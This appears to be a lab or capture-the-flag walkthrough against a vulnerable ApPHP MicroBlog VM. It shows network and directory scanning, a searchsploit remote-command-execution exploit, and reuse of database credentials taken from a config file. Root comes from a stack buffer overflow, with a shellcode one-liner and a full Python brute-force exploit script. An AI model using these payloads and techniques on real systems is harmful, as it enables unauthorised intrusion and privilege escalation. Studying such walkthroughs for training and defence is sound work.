Information gathering

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11    (Unknown: locally administered)
192.168.31.2    08:00:27:70:2e:5f    PCS Systemtechnik GmbH
192.168.31.159  08:00:27:b3:1b:96    PCS Systemtechnik GmbH
```
192.168.31.159 is the target machine (the Kali attacker box is 192.168.31.129 on eth0).
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.159 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 02:36 EDT
Nmap scan report for 192.168.31.159
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
41157/tcp open  unknown
MAC Address: 08:00:27:B3:1B:96 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
```
Port 111 is rpcbind, and the high port 41157 is most likely a service registered with it (`rpcinfo -p 192.168.31.159` or `nmap -sV` would name it); neither is needed here. Port 80 is the way in, so the next step is directory enumeration:
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.159/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.jpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.159/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.31.159/images/]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 5656]
/docs                 (Status: 301) [Size: 315] [--> http://192.168.31.159/docs/]
/page                 (Status: 301) [Size: 315] [--> http://192.168.31.159/page/]
/header.php           (Status: 200) [Size: 13]
/admin                (Status: 301) [Size: 316] [--> http://192.168.31.159/admin/]
/footer.php           (Status: 500) [Size: 614]
/license              (Status: 301) [Size: 318] [--> http://192.168.31.159/license/]
/README.txt           (Status: 200) [Size: 975]
/js                   (Status: 301) [Size: 313] [--> http://192.168.31.159/js/]
/include              (Status: 301) [Size: 318] [--> http://192.168.31.159/include/]
/backup               (Status: 301) [Size: 317] [--> http://192.168.31.159/backup/]
/styles               (Status: 301) [Size: 317] [--> http://192.168.31.159/styles/]
/INSTALL.txt          (Status: 200) [Size: 1201]
/.php                 (Status: 403) [Size: 279]
/wysiwyg              (Status: 301) [Size: 318] [--> http://192.168.31.159/wysiwyg/]
/server-status        (Status: 403) [Size: 279]
/mails                (Status: 301) [Size: 316] [--> http://192.168.31.159/mails/]
```
/README.txt reveals that the site runs on ApPHP. /mails/ holds the application's e-mail templates; the one below is the password-reminder mail, and since it sends the user's password back in clear text, the application must keep passwords in a recoverable form rather than as one-way hashes. Nothing else gobuster found is useful.
```
Hello _USER_NAME_!<br>
<br>
You or someone else asked for your login info on our site, _WEB_SITE_

Your Login Info:
------------------------<br/>
Username: _USER_NAME_
Password: _USER_PASSWORD_
------------------<br/>

Best regards,
_WEB_SITE_
```
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# searchsploit apphp
------------------------------------------------------------------------ -------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ -------------------------
ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities                        | php/webapps/33030.txt
ApPHP MicroBlog 1.0.1 - Remote Command Execution                        | php/webapps/33070.py
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)     | php/webapps/40506.html
ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting                 | php/webapps/40505.txt
ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)           | php/webapps/40517.html
ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting                  | php/webapps/40516.txt
------------------------------------------------------------------------ -------------------------
Shellcodes: No Results
Papers: No Results
```
Running php/webapps/33070.py against the target URL is all it takes; it hands back a shell as www-data. Copy it out with `searchsploit -m php/webapps/33070.py` and read its usage first with `searchsploit -x php/webapps/33070.py`. The choice of the MicroBlog 1.0.1 exploit (rather than the MicroCMS ones) is consistent with the database settings found later, whose table prefix is mb101_.
Privilege escalation

/var/www/html/include/base.inc.php contains a username and password:
```php
www-data@debian:/var/www/html/include$ cat base.inc.php
<?php
// DATABASE CONNECTION INFORMATION
define('DATABASE_HOST', 'localhost');         // Database host
define('DATABASE_NAME', 'microblog');         // Name of the database to be used
define('DATABASE_USERNAME', 'clapton');       // User name for access to database
define('DATABASE_PASSWORD', 'yaraklitepe');   // Password for access to database
define('DB_ENCRYPT_KEY', 'p52plaiqb8');       // Database encryption key
define('DB_PREFIX', 'mb101_');                // Unique prefix of all table names in the database
?>
```
`su clapton` with the database password yaraklitepe works: the credential is reused for the local account. Trying any password from a config file against the system users of the same name is always worth a shot.
Privilege escalation to root

clapton's home directory holds a program, input, and a note:
```
clapton@debian:~$ cat note.txt
buffer overflow is the way. ( ͡° ͜ʖ ͡°)

if you're new on 32bit bof then check these:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
```
Decompiled pseudo-C of input:

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char dest[159]; // [esp+11h] [ebp-9Fh] BYREF   -- 159-byte stack buffer

  if ( argc <= 1 )
  {
    printf("Syntax: %s <input string>\n", *argv);
    exit(0);
  }
  strcpy(dest, argv[1]); // unbounded copy of argv[1]: this is the overflow
  return 0;
}
```
I honestly can't do binary exploitation, so I followed an expert's writeup.
Payload:

```bash
for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\xa0\xe7\x84\xbf" + "\x90" * 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')) ; done
```

How it is put together: 171 bytes of padding reach the saved return address (dest is declared as 159 bytes, but the distance to the return address depends on how the compiler laid out main's frame, so the offset is found by testing, not read off the declared size). "\xa0\xe7\x84\xbf" is the little-endian stack address 0xbf84e7a0 that the return address is overwritten with. The 1000 NOPs form a sled, so any address inside it slides into the 27-byte shellcode, a standard 32-bit Linux execve("/bin//sh") stub whose string is NOT-encoded so the shellcode contains no NUL byte (strcpy would stop at the first one). The address is a guess, which is why the command is wrapped in a loop: with ASLR the stack moves on every run, and the loop keeps trying until the guess lands in the sled and a shell spawns (the loop then blocks until that shell is exited). Two things to verify before blaming the address if it never works: the binary needs an executable stack (`readelf -l input | grep GNU_STACK` should show RWE), and `python` must be Python 2; Python 3's print would write "\xa0" and friends as multi-byte UTF-8 and corrupt the payload.
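The same payload rebuilt in Python 3 as an added example (this is not the original writeup's code): it assembles padding, return address, NOP sled and shellcode as raw bytes, checks for NUL bytes, decodes the NOT-encoded "/bin//sh" so the shellcode can be confirmed rather than trusted, and runs the same brute-force loop with subprocess. The offset 171 and the address 0xbf84e7a0 are taken from the payload above; the target path ./input is assumed to be the binary in clapton's home directory, and the loop's "exit status 0 means a shell ran" heuristic is an assumption about how the spawned shell is exited.

```python
#!/usr/bin/env python3
"""Rebuild and sanity-check the stack-overflow payload used against ./input.

Added example, not from the original writeup. Uses Python 3 bytes so the
payload is never re-encoded as UTF-8 the way a Python 3 print("\xa0") would be.
"""
import os
import struct
import subprocess
import sys

PAD_LEN = 171           # bytes from the start of dest to the saved return address (from the writeup)
RET_ADDR = 0xBF84E7A0   # guessed stack address inside the NOP sled (from the writeup)
SLED_LEN = 1000

# execve("/bin//sh", NULL, NULL) for 32-bit Linux. "/bin//sh" is stored bitwise-NOT
# encoded so the shellcode has no NUL byte; strcpy would stop copying at one.
SHELLCODE = bytes.fromhex(
    "31c9"          # xor ecx, ecx        ; argv = NULL
    "f7e1"          # mul ecx             ; eax = edx = 0 (envp = NULL)
    "51"            # push ecx            ; string terminator
    "bfd0d08c97"    # mov edi, 0x978cd0d0 ; ~"//sh"
    "bed09d9691"    # mov esi, 0x91969dd0 ; ~"/bin"
    "f7d7"          # not edi
    "f7d6"          # not esi
    "57"            # push edi
    "56"            # push esi            ; esp -> "/bin//sh\0"
    "89e3"          # mov ebx, esp        ; filename
    "b00b"          # mov al, 11          ; SYS_execve
    "cd80"          # int 0x80
)


def decode_not_encoded(imm: int) -> bytes:
    """Return the 4-byte little-endian string hidden behind a NOT-encoded immediate."""
    return struct.pack("<I", (~imm) & 0xFFFFFFFF)


def shellcode_string() -> bytes:
    """The path the shellcode builds on the stack, lowest address first.

    push edi ("//sh") happens first and push esi ("/bin") second, so "/bin"
    ends up at the lower address and the string reads "/bin//sh".
    """
    return decode_not_encoded(0x91969DD0) + decode_not_encoded(0x978CD0D0)


def build_payload(ret_addr: int = RET_ADDR, pad_len: int = PAD_LEN,
                  sled_len: int = SLED_LEN) -> bytes:
    """padding | return address (little-endian) | NOP sled | shellcode"""
    payload = b"A" * pad_len + struct.pack("<I", ret_addr) + b"\x90" * sled_len + SHELLCODE
    # argv[1] is a C string: a NUL anywhere in it would truncate the copy.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


def brute_force(binary: str = "./input", attempts: int = 10000) -> int:
    """Run the target until the guessed address lands in the sled.

    Returns the attempt number that succeeded, or 0 if none did. A crash comes
    back as a negative signal number; a spawned /bin/sh that the user exits
    returns 0 (assumption: the operator exits the shell normally).
    """
    payload = build_payload()
    for i in range(1, attempts + 1):
        rc = subprocess.call([binary, payload])  # POSIX subprocess accepts bytes argv
        if rc == 0:
            return i
    return 0


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "./input"
    if not os.path.exists(target):
        sys.exit(f"{target} not found; run this on the box next to the binary")
    print("hit after", brute_force(target), "attempts")
```

Run it on the target as `python3 bof.py ./input`; the assertions it is built around (1202-byte payload, address at offset 171, 27-byte NUL-free shellcode, decoded string "/bin//sh") are the checks to repeat whenever the offset, address or shellcode is changed.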